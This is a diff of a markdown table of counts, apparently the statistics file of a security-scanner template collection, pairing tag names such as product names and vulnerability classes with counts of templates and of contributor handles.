| | | | -| openam | 3 | bolli95 | 1 | | | | | | | -| kevinlab | 3 | 0xrod | 1 | | | | | | | -| bitrix | 3 | mass0ma | 1 | | | | | | | -| lfr | 3 | flag007 | 1 | | | | | | | -| search | 3 | exploitation | 1 | | | | | | | -| targa | 3 | adrianmf | 1 | | | | | | | -| fanruan | 3 | shifacyclewla | 1 | | | | | | | -| ssh | 3 | iampritam | 1 | | | | | | | -| minio | 3 | s1r1u5_ | 1 | | | | | | | -| azure | 3 | izn0u | 1 | | | | | | | -| injection | 3 | micha3lb3n | 1 | | | | | | | -| nexus | 3 | affix | 1 | | | | | | | -| backdoor | 3 | florianmaak | 1 | | | | | | | -| cloud | 3 | willd96 | 1 | | | | | | | -| sonicwall | 3 | rotemreiss | 1 | | | | | | | -| itop | 3 | evolutionsec | 1 | | | | | | | -| jeesns | 3 | philippdelteil | 1 | | | | | | | -| ofbiz | 3 | revblock | 1 | | | | | | | -| openssh | 3 | andysvints | 1 | | | | | | | -| exposures | 3 | j3ssie/geraldino2 | 1 | | | | | | | -| opensis | 3 | manuelbua | 1 | | | | | | | -| linkerd | 3 | wabafet | 1 | | | | | | | -| log | 3 | sshell | 1 | | | | | | | -| tikiwiki | 3 | pdp | 1 | | | | | | | -| node | 3 | regala_ | 1 | | | | | | | -| cacti | 3 | x6263 | 1 | | | | | | | -| mongodb | 3 | elder tao | 1 | | | | | | | -| springcloud | 3 | shreyapohekar | 1 | | | | | | | -| caucho | 3 | oscarintherocks | 1 | | | | | | | -| ebs | 3 | zandros0 | 1 | | | | | | | -| cves | 3 | _harleo | 1 | | | | | | | -| oa | 3 | igibanez | 1 | | | | | | | -| r-seenet | 3 | pudsec | 1 | | | | | | | -| hoteldruid | 3 | nytr0gen | 1 | | | | | | | -| vbulletin | 3 | clarkvoss | 1 | | | | | | | -| nosqli | 3 | mhdsamx | 1 | | | | | | | -| mail | 3 | juicypotato1 | 1 | | | | | | | -| httpd | 3 | borna nematzadeh | 1 | | | | | | | -| bigip | 3 | nerrorsec | 1 | | | | | | | -| github | 3 | _c0wb0y_ | 1 | | | | | | | -| terramaster | 3 | tirtha_mandal | 1 | | | | | | | -| zhiyuan | 3 | d0rkerdevil | 1 | | | | | | | -| nacos | 3 | becivells | 1 | | | | | | | -| cve2007 | 3 | un-fmunozs | 1 | | | | | | | -| lansweeper | 3 | 0xtavian | 1 | | | | | | | -| kibana | 3 | j33n1k4 | 1 | | | | | | | -| smtp | 3 | cookiehanhoan | 1 | | | | | | | -| fpd | 3 | ahmed sherif | 1 | | | | | | | -| jellyfin | 3 | elmahdi | 1 | | | | | | | -| druid | 3 | hanlaomo | 1 | | | | | | | -| cache | 2 | elouhi | 1 | | | | | | | -| oauth | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| openvpn | 2 | yashgoti | 1 | | | | | | | -| trixbox | 2 | droberson | 1 | | | | | | | -| vcenter | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| nagios | 2 | yavolo | 1 | | | | | | | -| akamai | 2 | thevillagehacker | 1 | | | | | | | -| natshell | 2 | kba@sogeti_esec | 1 | | | | | | | -| grav | 2 | dahse89 | 1 | | | | | | | -| spark | 2 | aresx | 1 | | | | | | | -| icewarp | 2 | ohlinge | 1 | | | | | | | -| hjtcloud | 2 | bad5ect0r | 1 | | | | | | | -| flir | 2 | daviey | 1 | | | | | | | -| prtg | 2 | retr02332 | 1 | | | | | | | -| ecoa | 2 | taielab | 1 | | | | | | | -| favicon | 2 | kurohost | 1 | | | | | | | -| qihang | 2 | lethargynavigator | 1 | | | | | | | -| aspose | 2 | infosecsanyam | 1 | | | | | | | -| chamilo | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| ilo | 2 | ratnadip gajbhiye | 1 | | | | | | | -| places | 2 | sec_hawk | 1 | | | | | | | -| getsimple | 2 | furkansenan | 1 | | | | | | | -| showdoc | 2 | @dwisiswant0 | 1 | | | | | | | -| leak | 2 | 52971 | 1 | | | | | | | -| text | 2 | streetofhackerr007 | 1 | | | | | | | -| liferay | 2 | fopina | 1 | | | | | | | -| axis | 2 | makyotox | 1 | | | | | | | -| kentico | 2 | th3.d1p4k | 1 | | | | | | | -| glassfish | 2 | deena | 1 | | | | | | | -| couchdb | 2 | jeya seelan | 1 | | | | | | | -| dolibarr | 2 | kabirsuda | 1 | | | | | | | -| yapi | 2 | defr0ggy | 1 | | | | | | | -| shellshock | 2 | geraldino2 | 1 | | | | | | | -| dos | 2 | 0xd0ff9 | 1 | | | | | | | -| mailchimp | 2 | sickwell | 1 | | | | | | | -| s3 | 2 | yashanand155 | 1 | | | | | | | -| nextcloud | 2 | mesaglio | 1 | | | | | | | -| linux | 2 | akash.c | 1 | | | | | | | -| sonarqube | 2 | sicksec | 1 | | | | | | | -| middleware | 2 | sbani | 1 | | | | | | | -| payara | 2 | push4d | 1 | | | | | | | -| sharepoint | 2 | its0x08 | 1 | | | | | | | -| voipmonitor | 2 | blckraven | 1 | | | | | | | -| vrealize | 2 | 0h1in9e | 1 | | | | | | | -| igs | 2 | akshansh | 1 | | | | | | | -| storage | 2 | orpheus | 1 | | | | | | | -| plesk | 2 | zhenwarx | 1 | | | | | | | -| embed | 2 | whynotke | 1 | | | | | | | -| mida | 2 | b4uh0lz | 1 | | | | | | | -| rockmongo | 2 | ahmetpergamum | 1 | | | | | | | -| huawei | 2 | ipanda | 1 | | | | | | | -| wordfence | 2 | b0yd | 1 | | | | | | | -| chyrp | 2 | ajaysenr | 1 | | | | | | | -| bucket | 2 | intx0x80 | 1 | | | | | | | -| nextjs | 2 | berkdusunur | 1 | | | | | | | -| idrac | 2 | ooooooo_q | 1 | | | | | | | -| electron | 2 | petruknisme | 1 | | | | | | | -| rancher | 2 | alperenkesk | 1 | | | | | | | -| xxljob | 2 | smaranchand | 1 | | | | | | | -| enumeration | 2 | dawid-czarnecki | 1 | | | | | | | -| pega | 2 | retr0 | 1 | | | | | | | -| hpe | 2 | 0xteles | 1 | | | | | | | -| totemomail | 2 | rojanrijal | 1 | | | | | | | -| qcubed | 2 | _darrenmartyn | 1 | | | | | | | -| maian | 2 | mubassirpatel | 1 | | | | | | | -| webcam | 2 | remonsec | 1 | | | | | | | -| avantfax | 2 | luci | 1 | | | | | | | -| guacamole | 2 | chron0x | 1 | | | | | | | -| prestashop | 2 | patralos | 1 | | | | | | | -| horde | 2 | notsoevilweasel | 1 | | | | | | | -| backups | 2 | kareemse1im | 1 | | | | | | | -| aruba | 2 | @github.com/defr0ggy | 1 | | | | | | | -| commax | 2 | raesene | 1 | | | | | | | -| kong | 2 | tim_koopmans | 1 | | | | | | | -| harbor | 2 | aceseven (digisec360) | 1 | | | | | | | -| ec2 | 2 | kre80r | 1 | | | | | | | -| sitecore | 2 | andirrahmani1 | 1 | | | | | | | -| odoo | 2 | rodnt | 1 | | | | | | | -| akkadian | 2 | bernardo rodrigues | 1 | | | | | | | +| dns | 13 | wisnupramoedya | 4 | | | | | | | +| adobe | 13 | e_schultze_ | 4 | | | | | | | +| zoho | 13 | f1tz | 3 | | | | | | | +| dlink | 13 | johnjhacking | 3 | | | | | | | +| android | 13 | 0w4ys | 3 | | | | | | | +| jenkins | 12 | shifacyclewala | 3 | | | | | | | +| manageengine | 12 | me9187 | 3 | | | | | | | +| magento | 11 | thomas_from_offensity | 3 | | | | | | | +| cve2013 | 11 | jarijaas | 3 | | | | | | | +| xxe | 11 | binaryfigments | 3 | | | | | | | +| dell | 10 | fyoorer | 3 | | | | | | | +| intrusive | 10 | sushantkamble | 3 | | | | | | | +| hp | 10 | mavericknerd | 3 | | | | | | | +| gitlab | 9 | z3bd | 3 | | | | | | | +| ftp | 9 | idealphase | 3 | | | | | | | +| vmware | 9 | sullo | 3 | | | | | | | +| ibm | 9 | impramodsargar | 3 | | | | | | | +| kubernetes | 9 | emenalf | 3 | | | | | | | +| rails | 8 | _generic_human_ | 3 | | | | | | | +| microsoft | 8 | vsh00t | 3 | | | | | | | +| scada | 8 | unstabl3 | 3 | | | | | | | +| cve2008 | 8 | skeltavik | 3 | | | | | | | +| airflow | 8 | yash anand @yashanand155 | 3 | | | | | | | +| fastjson | 8 | shine | 3 | | | | | | | +| backup | 8 | dudez | 3 | | | | | | | +| ruijie | 8 | bp0lr | 2 | | | | | | | +| cnvd | 8 | hetroublemakr | 2 | | | | | | | +| nginx | 8 | gevakun | 2 | | | | | | | +| confluence | 7 | nkxxkn | 2 | | | | | | | +| files | 7 | ehsahil | 2 | | | | | | | +| netgear | 7 | afaq | 2 | | | | | | | +| coldfusion | 7 | udit_thakkur | 2 | | | | | | | +| camera | 7 | randomrobbie | 2 | | | | | | | +| cms | 7 | parth | 2 | | | | | | | +| phpmyadmin | 6 | dheerajmadhukar | 2 | | | | | | | +| api | 6 | bsysop | 2 | | | | | | | +| laravel | 6 | 0xcrypto | 2 | | | | | | | +| drupal | 6 | 0xelkomy | 2 | | | | | | | +| citrix | 6 | dahse89 | 2 | | | | | | | +| rconfig | 6 | gal nagli | 2 | | | | | | | +| prometheus | 6 | joeldeleep | 2 | | | | | | | +| lucee | 6 | amsda | 2 | | | | | | | +| docker | 6 | random-robbie | 2 | | | | | | | +| django | 6 | x1m_martijn | 2 | | | | | | | +| jetty | 6 | cocxanh | 2 | | | | | | | +| fileupload | 6 | lotusdll | 2 | | | | | | | +| nodejs | 6 | fabaff | 2 | | | | | | | +| solr | 6 | alifathi-h1 | 2 | | | | | | | +| circarlife | 5 | martincodes-de | 2 | | | | | | | +| symfony | 5 | bing0o | 2 | | | | | | | +| printer | 5 | 0xrudra | 2 | | | | | | | +| iis | 5 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| headless | 5 | zomsop82 | 2 | | | | | | | +| java | 5 | 0xsmiley | 2 | | | | | | | +| thinkphp | 5 | foulenzer | 2 | | | | | | | +| dedecms | 5 | socketz | 2 | | | | | | | +| crlf | 5 | swissky | 2 | | | | | | | +| jolokia | 5 | pxmme1337 | 2 | | | | | | | +| tomcat | 5 | koti2 | 2 | | | | | | | +| windows | 5 | hahwul | 2 | | | | | | | +| wso2 | 5 | w4cky_ | 2 | | | | | | | +| ssti | 5 | arcc | 2 | | | | | | | +| symantec | 4 | g4l1t0 | 2 | | | | | | | +| resin | 4 | sy3omda | 2 | | | | | | | +| grafana | 4 | convisoappsec | 2 | | | | | | | +| amazon | 4 | mohammedsaneem | 2 | | | | | | | +| keycloak | 4 | moritz nentwig | 2 | | | | | | | +| npm | 4 | r12w4n | 2 | | | | | | | +| moodle | 4 | vavkamil | 2 | | | | | | | +| zimbra | 4 | manas_harsh | 2 | | | | | | | +| glpi | 4 | r3naissance | 2 | | | | | | | +| slack | 4 | kiblyn11 | 2 | | | | | | | +| webserver | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| asp | 4 | ree4pwn | 2 | | | | | | | +| solarwinds | 4 | davidmckennirey | 2 | | | | | | | +| vpn | 4 | lark-lab | 2 | | | | | | | +| exchange | 4 | huowuzhao | 2 | | | | | | | +| firmware | 4 | whoever | 2 | | | | | | | +| maps | 4 | 0xsapra | 2 | | | | | | | +| microstrategy | 4 | bernardofsr | 2 | | | | | | | +| buffalo | 4 | 0xprial | 2 | | | | | | | +| elastic | 4 | infosecsanyam | 1 | | | | | | | +| hongdian | 4 | ldionmarcil | 1 | | | | | | | +| traversal | 4 | lark lab | 1 | | | | | | | +| rfi | 4 | noamrathaus | 1 | | | | | | | +| samsung | 4 | fmunozs | 1 | | | | | | | +| artifactory | 4 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| proxy | 4 | bolli95 | 1 | | | | | | | +| strapi | 4 | thezakman | 1 | | | | | | | +| magmi | 4 | sbani | 1 | | | | | | | +| zabbix | 4 | philippdelteil | 1 | | | | | | | +| git | 4 | ilovebinbash | 1 | | | | | | | +| firebase | 4 | soyelmago | 1 | | | | | | | +| thinkcmf | 4 | bjhulst | 1 | | | | | | | +| fatpipe | 4 | j3ssie/geraldino2 | 1 | | | | | | | +| minio | 3 | bad5ect0r | 1 | | | | | | | +| zhiyuan | 3 | kurohost | 1 | | | | | | | +| r-seenet | 3 | udyz | 1 | | | | | | | +| vbulletin | 3 | raesene | 1 | | | | | | | +| ebs | 3 | daviey | 1 | | | | | | | +| targa | 3 | akshansh | 1 | | | | | | | +| caucho | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| log | 3 | borna nematzadeh | 1 | | | | | | | +| search | 3 | orpheus | 1 | | | | | | | +| bigip | 3 | mah3sec_ | 1 | | | | | | | +| nosqli | 3 | aceseven (digisec360) | 1 | | | | | | | +| openam | 3 | hanlaomo | 1 | | | | | | | +| tikiwiki | 3 | qlkwej | 1 | | | | | | | +| terramaster | 3 | wabafet | 1 | | | | | | | +| ssh | 3 | xstp | 1 | | | | | | | +| injection | 3 | 0xd0ff9 | 1 | | | | | | | +| openssh | 3 | th3.d1p4k | 1 | | | | | | | +| nacos | 3 | kaizensecurity | 1 | | | | | | | +| oa | 3 | manuelbua | 1 | | | | | | | +| nexus | 3 | b0yd | 1 | | | | | | | +| bitrix | 3 | patralos | 1 | | | | | | | +| jeesns | 3 | apt-mirror | 1 | | | | | | | +| azure | 3 | alex | 1 | | | | | | | +| github | 3 | kabirsuda | 1 | | | | | | | +| cve2007 | 3 | exploitation | 1 | | | | | | | +| fanruan | 3 | retr0 | 1 | | | | | | | +| cloud | 3 | intx0x80 | 1 | | | | | | | +| cacti | 3 | jrolf | 1 | | | | | | | +| ofbiz | 3 | ooooooo_q | 1 | | | | | | | +| hoteldruid | 3 | willd96 | 1 | | | | | | | +| lansweeper | 3 | nerrorsec | 1 | | | | | | | +| springcloud | 3 | tirtha_mandal | 1 | | | | | | | +| httpd | 3 | affix | 1 | | | | | | | +| sonicwall | 3 | thevillagehacker | 1 | | | | | | | +| fpd | 3 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| cves | 3 | fopina | 1 | | | | | | | +| jellyfin | 3 | deena | 1 | | | | | | | +| lfr | 3 | ajaysenr | 1 | | | | | | | +| node | 3 | forgedhallpass | 1 | | | | | | | +| druid | 3 | zhenwarx | 1 | | | | | | | +| mongodb | 3 | kareemse1im | 1 | | | | | | | +| exposures | 3 | tim_koopmans | 1 | | | | | | | +| backdoor | 3 | _harleo | 1 | | | | | | | +| mail | 3 | streetofhackerr007 | 1 | | | | | | | +| telerik | 3 | sshell | 1 | | | | | | | +| linkerd | 3 | elouhi | 1 | | | | | | | +| itop | 3 | brabbit10 | 1 | | | | | | | +| opensis | 3 | 0h1in9e | 1 | | | | | | | +| kafka | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| smtp | 3 | ahmed sherif | 1 | | | | | | | +| kevinlab | 3 | aresx | 1 | | | | | | | +| kibana | 3 | luskabol | 1 | | | | | | | +| trixbox | 2 | omarkurt | 1 | | | | | | | +| akkadian | 2 | ahmetpergamum | 1 | | | | | | | +| aspose | 2 | zandros0 | 1 | | | | | | | +| globalprotect | 2 | yashgoti | 1 | | | | | | | +| lotus | 2 | undefl0w | 1 | | | | | | | +| couchdb | 2 | clarkvoss | 1 | | | | | | | +| leak | 2 | sickwell | 1 | | | | | | | +| tidb | 2 | andysvints | 1 | | | | | | | +| activemq | 2 | schniggie | 1 | | | | | | | +| oauth | 2 | harshinsecurity | 1 | | | | | | | +| prtg | 2 | berkdusunur | 1 | | | | | | | +| wuzhicms | 2 | vzamanillo | 1 | | | | | | | +| openfire | 2 | taielab | 1 | | | | | | | +| axis | 2 | andirrahmani1 | 1 | | | | | | | +| yii | 2 | jeya seelan | 1 | | | | | | | +| ecology | 2 | micha3lb3n | 1 | | | | | | | +| harbor | 2 | yashanand155 | 1 | | | | | | | +| maian | 2 | co0nan | 1 | | | | | | | +| phpcollab | 2 | @ofjaaah | 1 | | | | | | | +| igs | 2 | s1r1u5_ | 1 | | | | | | | +| linkedin | 2 | hakluke | 1 | | | | | | | +| nextcloud | 2 | ratnadip gajbhiye | 1 | | | | | | | +| hpe | 2 | b4uh0lz | 1 | | | | | | | +| mailchimp | 2 | remonsec | 1 | | | | | | | +| backups | 2 | izn0u | 1 | | | | | | | +| splunk | 2 | @github.com/defr0ggy | 1 | | | | | | | +| totemomail | 2 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| aviatrix | 2 | soyelmago | 1 | | | | | | | -| openfire | 2 | vzamanillo | 1 | | | | | | | -| smb | 2 | hakluke | 1 | | | | | | | -| bitly | 2 | luskabol | 1 | | | | | | | -| chiyu | 2 | co0nan | 1 | | | | | | | -| lotus | 2 | thebinitghimire | 1 | | | | | | | -| bypass | 2 | knassar702 | 1 | | | | | | | -| fortios | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| geowebserver | 2 | bjhulst | 1 | | | | | | | -| hashicorp | 2 | toufik airane | 1 | | | | | | | -| service | 2 | noamrathaus | 1 | | | | | | | -| justwriting | 2 | 0ut0fb4nd | 1 | | | | | | | -| jeedom | 2 | b0rn2r00t | 1 | | | | | | | -| tidb | 2 | brabbit10 | 1 | | | | | | | -| status | 2 | omarkurt | 1 | | | | | | | -| paloalto | 2 | pratik khalane | 1 | | | | | | | -| seeyon | 2 | c3l3si4n | 1 | | | | | | | -| adminer | 2 | shelld3v | 1 | | | | | | | -| waf | 2 | absshax | 1 | | | | | | | -| hasura | 2 | forgedhallpass | 1 | | | | | | | -| rstudio | 2 | mah3sec_ | 1 | | | | | | | -| frp | 2 | ldionmarcil | 1 | | | | | | | -| ucmdb | 2 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| upload | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| yii | 2 | udyz | 1 | | | | | | | -| heroku | 2 | | | | | | | | | -| jboss | 2 | | | | | | | | | -| netis | 2 | | | | | | | | | -| netsweeper | 2 | | | | | | | | | -| mcafee | 2 | | | | | | | | | +| db | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | +| frp | 2 | j33n1k4 | 1 | | | | | | | +| geowebserver | 2 | nvn1729 | 1 | | | | | | | +| payara | 2 | c3l3si4n | 1 | | | | | | | +| waf | 2 | kre80r | 1 | | | | | | | +| prestashop | 2 | alph4byt3 | 1 | | | | | | | +| yapi | 2 | luci | 1 | | | | | | | +| favicon | 2 | knassar702 | 1 | | | | | | | +| qcubed | 2 | retr02332 | 1 | | | | | | | +| jeedom | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| idrac | 2 | kba@sogeti_esec | 1 | | | | | | | +| vcenter | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| openemr | 2 | sec_hawk | 1 | | | | | | | +| jsf | 2 | _darrenmartyn | 1 | | | | | | | +| rancher | 2 | majidmc2 | 1 | | | | | | | +| spark | 2 | _0xf4n9x_ | 1 | | | | | | | +| netsweeper | 2 | makyotox | 1 | | | | | | | +| cache | 2 | 52971 | 1 | | | | | | | +| justwriting | 2 | geraldino2 | 1 | | | | | | | +| rstudio | 2 | smaranchand | 1 | | | | | | | +| icewarp | 2 | whynotke | 1 | | | | | | | +| cve2005 | 2 | _c0wb0y_ | 1 | | | | | | | +| chiyu | 2 | absshax | 1 | | | | | | | +| odoo | 2 | chron0x | 1 | | | | | | | +| adminer | 2 | mhdsamx | 1 | | | | | | | +| emerge | 2 | shelld3v | 1 | | | | | | | +| pega | 2 | 0ut0fb4nd | 1 | | | | | | | +| natshell | 2 | cookiehanhoan | 1 | | | | | | | +| heroku | 2 | rotemreiss | 1 | | | | | | | +| rocketchat | 2 | its0x08 | 1 | | | | | | | +| nextjs | 2 | iampritam | 1 | | | | | | | +| service | 2 | regala_ | 1 | | | | | | | +| phpstorm | 2 | akash.c | 1 | | | | | | | +| xxljob | 2 | d0rkerdevil | 1 | | | | | | | +| paloalto | 2 | ipanda | 1 | | | | | | | +| mcafee | 2 | adrianmf | 1 | | | | | | | +| idea | 2 | 0xrod | 1 | | | | | | | +| status | 2 | 0xtavian | 1 | | | | | | | +| hasura | 2 | juicypotato1 | 1 | | | | | | | +| ecoa | 2 | droberson | 1 | | | | | | | +| webcam | 2 | rodnt | 1 | | | | | | | +| horde | 2 | ringo | 1 | | | | | | | +| aruba | 2 | pratik khalane | 1 | | | | | | | +| jetbrains | 2 | @dwisiswant0 | 1 | | | | | | | +| guacamole | 2 | toufik airane | 1 | | | | | | | +| hashicorp | 2 | mubassirpatel | 1 | | | | | | | +| liferay | 2 | x6263 | 1 | | | | | | | +| flir | 2 | dawid-czarnecki | 1 | | | | | | | +| linux | 2 | evolutionsec | 1 | | | | | | | +| avantfax | 2 | rojanrijal | 1 | | | | | | | +| redis | 2 | 0xteles | 1 | | | | | | | +| fortios | 2 | shifacyclewla | 1 | | | | | | | +| showdoc | 2 | push4d | 1 | | | | | | | +| hjtcloud | 2 | b0rn2r00t | 1 | | | | | | | +| openvpn | 2 | lethargynavigator | 1 | | | | | | | +| embed | 2 | alperenkesk | 1 | | | | | | | +| chamilo | 2 | furkansenan | 1 | | | | | | | +| sitecore | 2 | petruknisme | 1 | | | | | | | +| commax | 2 | shreyapohekar | 1 | | | | | | | +| ilo | 2 | defr0ggy | 1 | | | | | | | +| akamai | 2 | mesaglio | 1 | | | | | | | +| middleware | 2 | naglinagli | 1 | | | | | | | +| vrealize | 2 | yavolo | 1 | | | | | | | +| voipmonitor | 2 | pdp | 1 | | | | | | | +| getsimple | 2 | un-fmunozs | 1 | | | | | | | +| zeroshell | 2 | flag007 | 1 | | | | | | | +| bitly | 2 | jteles | 1 | | | | | | | +| enumeration | 2 | blckraven | 1 | | | | | | | +| aviatrix | 2 | elmahdi | 1 | | | | | | | +| glassfish | 2 | gboddin | 1 | | | | | | | +| ec2 | 2 | oscarintherocks | 1 | | | | | | | +| places | 2 | florianmaak | 1 | | | | | | | +| fortinet | 2 | pudsec | 1 | | | | | | | +| kong | 2 | becivells | 1 | | | | | | | +| qihang | 2 | igibanez | 1 | | | | | | | +| hostheader-injection | 2 | nytr0gen | 1 | | | | | | | +| huawei | 2 | sicksec | 1 | | | | | | | +| netis | 2 | thebinitghimire | 1 | | | | | | | +| mida | 2 | ohlinge | 1 | | | | | | | +| shellshock | 2 | mass0ma | 1 | | | | | | | +| plesk | 2 | elder tao | 1 | | | | | | | +| bucket | 2 | notsoevilweasel | 1 | | | | | | | +| rockmongo | 2 | revblock | 1 | | | | | | | +| ucmdb | 2 | | | | | | | | | +| upload | 2 | | | | | | | | | | bruteforce | 2 | | | | | | | | | -| globalprotect | 2 | | | | | | | | | -| ecology | 2 | | | | | | | | | -| activemq | 2 | | | | | | | | | -| axis2 | 2 | | | | | | | | | -| emerge | 2 | | | | | | | | | -| db | 2 | | | | | | | | | -| splunk | 2 | | | | | | | | | -| hostheader-injection | 2 | | | | | | | | | +| nagios | 2 | | | | | | | | | | saltstack | 2 | | | | | | | | | -| wuzhicms | 2 | | | | | | | | | -| cve2005 | 2 | | | | | | | | | -| phpcollab | 2 | | | | | | | | | -| jsf | 2 | | | | | | | | | -| panasonic | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| eprints | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| tieline | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| cves2001 | 1 | | | | | | | | | -| api-manager | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| yzmcms | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| okta | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| shopizer | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| phpwiki | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| buttercms | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| hiawatha | 1 | | | | | | | | | -| distance | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| woocommerce | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| solarlog | 1 | | | | | | | | | -| websvn | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| cloudron | 1 | | | | | | | | | -| route | 1 | | | | | | | | | -| messaging | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| websphere | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| mrtg | 1 | | | | | | | | | -| qdpm | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| fcm | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| maxsite | 1 | | | | | | | | | -| sonarcloud | 1 | | | | | | | | | -| metabase | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| hubspot | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| loqate | 1 | | | | | | | | | -| loganalyzer | 1 | | | | | | | | | -| deviantart | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| shiro | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| luftguitar | 1 | | | | | | | | | -| syslog | 1 | | | | | | | | | -| ipstack | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| cherokee | 1 | | | | | | | | | -| dbeaver | 1 | | | | | | | | | -| stripe | 1 | | | | | | | | | -| adb | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| vidyo | 1 | | | | | | | | | -| database | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| acontent | 1 | | | | | | | | | -| gurock | 1 | | | | | | | | | -| nifi | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| speed | 1 | | | | | | | | | -| smi | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| clink-office | 1 | | | | | | | | | -| whm | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| artica | 1 | | | | | | | | | -| graphql | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| calendly | 1 | | | | | | | | | -| place | 1 | | | | | | | | | -| find | 1 | | | | | | | | | -| cscart | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| bingmaps | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| okiko | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| karel | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| limit | 1 | | | | | | | | | -| cockpit | 1 | | | | | | | | | -| nerdgraph | 1 | | | | | | | | | -| centreon | 1 | | | | | | | | | -| buildkite | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| openemr | 1 | | | | | | | | | -| cofax | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| csrfguard | 1 | | | | | | | | | -| netmask | 1 | | | | | | | | | -| raspap | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| rocketchat | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| iterable | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| gespage | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| cve2006 | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| olivetti | 1 | | | | | | | | | -| gotmls | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| listserv | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | -| nearby | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| graylog | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| etherpad | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| elasticsearch | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| salesforce | 1 | | 